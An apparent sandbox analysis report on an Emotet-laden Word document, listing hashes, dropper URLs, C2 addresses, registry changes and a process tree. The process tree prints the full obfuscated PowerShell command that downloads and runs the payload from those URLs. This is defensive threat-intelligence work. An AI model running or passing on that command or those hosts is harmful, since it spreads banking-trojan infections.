emotet | ecdfed715dc8beb9879b1946fdb78e203c4dcdfde6c82f6f9657e08a72032859

General

Target

最新の構造図.doc
Size

176KB
MD5

4a1584e1207a1b269572133fedbe757e
SHA1

922bc92b8ee067a3764bf3bca8abb8c0aa6fed74
SHA256

ecdfed715dc8beb9879b1946fdb78e203c4dcdfde6c82f6f9657e08a72032859
SHA512

438229434ccbe427e2de3f43afb7b2745057ec2c601fb811fda12cbe9a24b487d417eeb484a5e1da9c79cc0f68451d8de1377ea52bd093927b60241ad7c892e3

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://reseller-demo-website.com/discussion/qWWf8FS/

exe.dropper

https://www.mockdumps.com/test/Z2pJ/

exe.dropper

https://twisterprint.com/chrometheme/Vcr/

exe.dropper

http://simulations.org/rw_common/KfX2MW/

exe.dropper

http://planosdesaudesemcarencia.com/erros/JHoq/

exe.dropper

https://viaje-achina.com/wp-admin/A1O8tL/

exe.dropper

https://cearacultural.com.br/turismo/oy/

Extracted

Family

emotet

C2

71.72.196.159:80

134.209.36.254:8080

120.138.30.150:8080

94.23.216.33:80

157.245.99.39:8080

137.59.187.107:8080

94.23.237.171:443

61.19.246.238:443

156.155.166.221:80

50.35.17.13:80

153.137.36.142:80

91.211.88.52:7080

209.141.54.221:8080

185.94.252.104:443

174.45.13.118:80

87.106.136.232:8080

62.75.141.82:80

213.196.135.145:80

188.219.31.12:80

82.80.155.43:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	1960	powershell.exe

Emotet Payload 8 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/812-16-0x00000000001D0000-0x00000000001E0000-memory.dmp	emotet
behavioral1/memory/812-16-0x00000000001D0000-0x00000000001E0000-memory.dmp	emotet
behavioral1/memory/812-15-0x0000000000260000-0x0000000000272000-memory.dmp	emotet
behavioral1/memory/812-15-0x0000000000260000-0x0000000000272000-memory.dmp	emotet
behavioral1/memory/844-20-0x0000000000230000-0x0000000000242000-memory.dmp	emotet
behavioral1/memory/844-20-0x0000000000230000-0x0000000000242000-memory.dmp	emotet
behavioral1/memory/844-21-0x0000000000250000-0x0000000000260000-memory.dmp	emotet
behavioral1/memory/844-21-0x0000000000250000-0x0000000000260000-memory.dmp	emotet

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

6 1976 powershell.exe
8 1976 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Avbjjxx_b.exePortableDeviceStatus.exe

pid process

812 Avbjjxx_b.exe
844 PortableDeviceStatus.exe

flow	pid	process
6	1976	powershell.exe
8	1976	powershell.exe

pid	process
812	Avbjjxx_b.exe
844	PortableDeviceStatus.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exeAvbjjxx_b.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\eventcls\PortableDeviceStatus.exe	Avbjjxx_b.exe

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{DF924026-F481-435F-8B27-E6A628F02405}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{DF924026-F481-435F-8B27-E6A628F02405}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{DF924026-F481-435F-8B27-E6A628F02405}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{DF924026-F481-435F-8B27-E6A628F02405}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1108 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exePortableDeviceStatus.exe

pid process

1976 powershell.exe
1976 powershell.exe
844 PortableDeviceStatus.exe
844 PortableDeviceStatus.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1976 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1108 WINWORD.EXE
1108 WINWORD.EXE

pid	process
1108	WINWORD.EXE

pid	process
1976	powershell.exe
1976	powershell.exe
844	PortableDeviceStatus.exe
844	PortableDeviceStatus.exe

description	pid	process
Token: SeDebugPrivilege	1976	powershell.exe

pid	process
1108	WINWORD.EXE
1108	WINWORD.EXE

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

powershell.exeAvbjjxx_b.exe

description	pid	process	target process
PID 1976 wrote to memory of 812	1976	powershell.exe	Avbjjxx_b.exe
PID 1976 wrote to memory of 812	1976	powershell.exe	Avbjjxx_b.exe
PID 1976 wrote to memory of 812	1976	powershell.exe	Avbjjxx_b.exe
PID 1976 wrote to memory of 812	1976	powershell.exe	Avbjjxx_b.exe
PID 812 wrote to memory of 844	812	Avbjjxx_b.exe	PortableDeviceStatus.exe
PID 812 wrote to memory of 844	812	Avbjjxx_b.exe	PortableDeviceStatus.exe
PID 812 wrote to memory of 844	812	Avbjjxx_b.exe	PortableDeviceStatus.exe
PID 812 wrote to memory of 844	812	Avbjjxx_b.exe	PortableDeviceStatus.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\最新の構造図.doc"
1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwAGUARQBcAEQAYQAzAEkAcABmAHYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBDAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAcgBpAHQAYAB5AGAAcABSAG8AdABPAGAAQwBvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAxADIAJwArACcALAAnACsAJwAgACcAKQArACcAdABsACcAKwAnAHMAJwArACcAMQAxACcAKwAoACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABQADQAZAA1AGIAZABpACAAPQAgACgAKAAnAEEAdgAnACsAJwBiACcAKQArACgAJwBqAGoAeAB4ACcAKwAnAF8AJwApACsAJwBiACcAKQA7ACQATgBsAGQAaQBrAHEAaQA9ACgAJwBFACcAKwAoACcAMgBwACcAKwAnAGoANwAnACsAJwBqAGcAJwApACkAOwAkAEMAZgBfAHkAbAA3AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ASQB4AF8AJwArACgAJwB1ADAAJwArACcAZQBlACcAKQArACcAewAwAH0ARABhADMAaQAnACsAJwBwAGYAJwArACcAdgB7ADAAJwArACcAfQAnACkAIAAtAGYAWwBjAGgAYQByAF0AOQAyACkAKwAkAFAANABkADUAYgBkAGkAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABaAHoAZABkAG4AbgBsAD0AKAAnAEYAJwArACcANQBkACcAKwAoACcAbAAnACsAJwBvAF8AeQAnACkAKQA7ACQAWAA0ADcANABmAHkAMgA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgB3AGUAYgBjAEwAaQBFAE4AdAA7ACQAUQBhADkAdwA1ADgAdwA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAcgBlAHMAZQAnACkAKwAoACcAbABsAGUAcgAtACcAKwAnAGQAZQAnACsAJwBtACcAKQArACcAbwAtACcAKwAnAHcAZQAnACsAJwBiAHMAJwArACcAaQAnACsAJwB0AGUAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAvACcAKwAoACcAZABpACcAKwAnAHMAYwB1AHMAJwApACsAKAAnAHMAJwArACcAaQBvAG4ALwBxAFcAVwBmACcAKwAnADgARgAnACkAKwAoACcAUwAnACsAJwAvACoAJwArACcAaAB0AHQAJwApACsAKAAnAHAAcwAnACsAJwA6AC8ALwB3ACcAKQArACcAdwB3ACcAKwAoACcALgBtACcAKwAnAG8AJwArACcAYwBrAGQAdQBtAHAAcwAuAGMAJwApACsAJwBvAG0AJwArACcALwAnACsAKAAnAHQAJwArACcAZQBzAHQALwAnACsAJwBaADIAcABKAC8AKgAnACsAJwBoACcAKQArACcAdAB0ACcAKwAoACcAcABzADoAJwArACcALwAnACkAKwAoACcALwB0ACcAKwAnAHcAaQAnACkAKwAoACcAcwAnACsAJwB0AGUAJwApACsAKAAnAHIAcAAnACsAJwByAGkAJwApACsAKAAnAG4AdAAnACsAJwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGMAaAByAG8AJwApACsAKAAnAG0AZQAnACsAJwB0AGgAZQAnACkAKwAoACcAbQBlAC8AVgAnACsAJwBjAHIAJwArACcALwAqACcAKQArACgAJwBoACcAKwAnAHQAdAAnACkAKwAoACcAcAA6AC8ALwAnACsAJwBzACcAKQArACcAaQBtACcAKwAoACcAdQAnACsAJwBsAGEAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAG8AcgAnACsAJwBnACcAKQArACcALwAnACsAKAAnAHIAdwBfAGMAJwArACcAbwBtACcAKQArACgAJwBtAG8AJwArACcAbgAvACcAKwAnAEsAZgAnACkAKwAnAFgAMgAnACsAKAAnAE0AVwAvACoAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwBwACcAKwAnAGwAYQAnACkAKwAnAG4AJwArACcAbwAnACsAKAAnAHMAJwArACcAZABlAHMAJwArACcAYQB1AGQAZQBzAGUAJwArACcAbQBjACcAKQArACcAYQAnACsAJwByAGUAJwArACcAbgBjACcAKwAnAGkAYQAnACsAJwAuACcAKwAnAGMAbwAnACsAKAAnAG0ALwAnACsAJwBlAHIAcgBvAHMALwAnACkAKwAnAEoAJwArACgAJwBIAG8AJwArACcAcQAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwB2AGkAYQBqAGUAJwArACcALQBhACcAKQArACgAJwBjACcAKwAnAGgAaQBuAGEALgAnACkAKwAnAGMAJwArACcAbwBtACcAKwAoACcALwB3AHAAJwArACcALQAnACkAKwAoACcAYQBkACcAKwAnAG0AaQAnACsAJwBuAC8AQQAxAE8AOAB0ACcAKQArACcATAAnACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcABzACcAKwAnADoALwAnACkAKwAoACcALwBjAGUAJwArACcAYQByACcAKQArACgAJwBhAGMAdQBsACcAKwAnAHQAdQByAGEAJwArACcAbAAnACsAJwAuACcAKwAnAGMAbwBtAC4AYgAnACkAKwAoACcAcgAvACcAKwAnAHQAJwApACsAJwB1ACcAKwAoACcAcgAnACsAJwBpAHMAJwArACcAbQBvAC8AbwB5AC8AJwApACkALgAiAFMAcABMAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWQA2AHQAZwB6AGwAXwA9ACgAJwBVAG4AJwArACgAJwB3ADAAbQAzACcAKwAnADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABXAGsAZQBuADgAaQBnACAAaQBuACAAJABRAGEAOQB3ADUAOAB3ACkAewB0AHIAeQB7ACQAWAA0ADcANABmAHkAMgAuACIAZABgAG8AdwBuAEwAbwBhAGQAZgBpAGAATABlACIAKAAkAFcAawBlAG4AOABpAGcALAAgACQAQwBmAF8AeQBsADcAcgApADsAJABDAGMAeAAwADgAMAByAD0AKAAoACcAQQBkACcAKwAnAGIAcQBtADgAJwApACsAJwBiACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABDAGYAXwB5AGwANwByACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgAzADgAMAAwACkAIAB7ACYAKAAnAEkAbgAnACsAJwB2AG8AawBlACcAKwAnAC0ASQB0AGUAbQAnACkAKAAkAEMAZgBfAHkAbAA3AHIAKQA7ACQAVABsAGEAMQBfAHMAegA9ACgAKAAnAE4AJwArACcAawBfADMAbQAnACkAKwAnAHkAcAAnACkAOwBiAHIAZQBhAGsAOwAkAEkAaABtAG4AMQA0AF8APQAoACcASgAnACsAJwBmACcAKwAoACcAdwBrACcAKwAnAHUAagA4ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADcAdwBxAHoAYwBkAD0AKAAnAFkAJwArACgAJwBqAG8AeQByAG8AJwArACcAeQAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976

C:\Users\Admin\Ix_u0ee\Da3ipfv\Avbjjxx_b.exe
"C:\Users\Admin\Ix_u0ee\Da3ipfv\Avbjjxx_b.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\eventcls\PortableDeviceStatus.exe
"C:\Windows\SysWOW64\eventcls\PortableDeviceStatus.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:844

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Ix_u0ee\Da3ipfv\Avbjjxx_b.exe

Download Submit
C:\Users\Admin\ix_U0eE\Da3Ipfv\Avbjjxx_b.exe

Download Submit
C:\Windows\SysWOW64\eventcls\PortableDeviceStatus.exe

Download Submit
memory/812-16-0x00000000001D0000-0x00000000001E0000-memory.dmp

Filesize
64KB

Download
memory/812-13-0x0000000000000000-mapping.dmp

Download
memory/812-15-0x0000000000260000-0x0000000000272000-memory.dmp

Filesize
72KB

Download
memory/844-18-0x0000000000000000-mapping.dmp

Download
memory/844-20-0x0000000000230000-0x0000000000242000-memory.dmp

Filesize
72KB

Download
memory/844-21-0x0000000000250000-0x0000000000260000-memory.dmp

Filesize
64KB

Download
memory/1108-2-0x00000000089A0000-0x00000000089A4000-memory.dmp

Filesize
16KB

Download
memory/1108-5-0x0000000006EE0000-0x00000000070E0000-memory.dmp

Filesize
2.0MB

Download
memory/1108-4-0x0000000006EE0000-0x00000000070E0000-memory.dmp

Filesize
2.0MB

Download
memory/1108-3-0x0000000006EE0000-0x00000000070E0000-memory.dmp

Filesize
2.0MB

Download
memory/1884-22-0x000007FEF6C10000-0x000007FEF6E8A000-memory.dmp

Filesize
2.5MB

Download
memory/1976-7-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/1976-12-0x000000001B6C0000-0x000000001B6C1000-memory.dmp

Filesize
4KB

Download
memory/1976-11-0x000000001B590000-0x000000001B591000-memory.dmp

Filesize
4KB

Download
memory/1976-10-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/1976-9-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download
memory/1976-8-0x000000001AB40000-0x000000001AB41000-memory.dmp

Filesize
4KB

Download
memory/1976-6-0x000007FEE9280000-0x000007FEE9C6C000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads